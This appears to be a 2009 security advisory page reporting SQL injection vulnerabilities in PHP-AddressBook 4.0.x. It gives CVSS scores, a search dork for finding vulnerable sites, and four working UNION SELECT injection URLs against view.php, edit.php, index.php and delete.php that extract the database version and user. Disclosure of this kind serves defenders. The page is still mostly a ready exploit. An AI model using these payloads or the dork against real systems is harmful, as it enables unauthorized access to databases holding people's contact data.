PHP-Address Book 4.0.x Multiple SQL Injection Vulnerabilities

2009.07.28
Credit: YEnH4ckEr
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

---------------------------------------------------------------------------------------------- | MULTIPLE SQL INJECTION VULNERABILITIES | |--------------------------------------------------------------------------------------------| | | PHP-AddressBook v-4.0.X | | | CMS INFORMATION: ---------------------------------- | | | |-->WEB: http://sourceforge.net/projects/php-addressbook/ | |-->DOWNLOAD: http://sourceforge.net/projects/php-addressbook/ | |-->DEMO: http://php-addressbook.sourceforge.net/demo/ | |-->CATEGORY: Address Book | |-->DESCRIPTION: Simple, web-based address & phone book, contact manager & organizer. | | Manage groups, addresses, e-Mails, phone numbers & birthdays... | |-->RELEASED: 2009-06-13 | | | | CMS VULNERABILITY: | | | |-->TESTED ON: firefox 3 | |-->DORK: "php-addressbook" | |-->CATEGORY: SQL INJECTION | |-->AFFECT VERSION: 4.0.X | |-->Discovered Bug date: 2009-06-16 | |-->Reported Bug date: 2009-06-16 | |-->Fixed bug date: N/A | |-->Info patch (????): N/A | |-->Author: YEnH4ckEr | |-->mail: y3nh4ck3r[at]gmail[dot]com | |-->WEB/BLOG: N/A | |-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | |-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | ---------------------------------------------------------------------------------------------- Note about versions: Demo is running release 4.0.1, but I didn't find this version to download ( 4.0 is highest). ##################### //////////////////// SQL INJECTION VULN: //////////////////// ##################### ----------- EXPLOITS: ----------- <<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> [++]http://[HOST]/[PATH]/view.php?id=-999%27+union+select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14%23 [++]http://[HOST]/[PATH]/edit.php?id=-1%27+union+select%201,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23 [++]http://[HOST]/[PATH]/index.php?alphabet=-1%27+union+all+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14%23 <<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>> [++]http://[HOST]/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23 ------------- WATCH VIDEO: ------------- SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo

Referencje:

http://www.securityfocus.com/bid/35511
http://www.milw0rm.com/exploits/9023
http://secunia.com/advisories/35590
http://www.youtube.com/watch?v=ON5waxZMnbo
(video)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top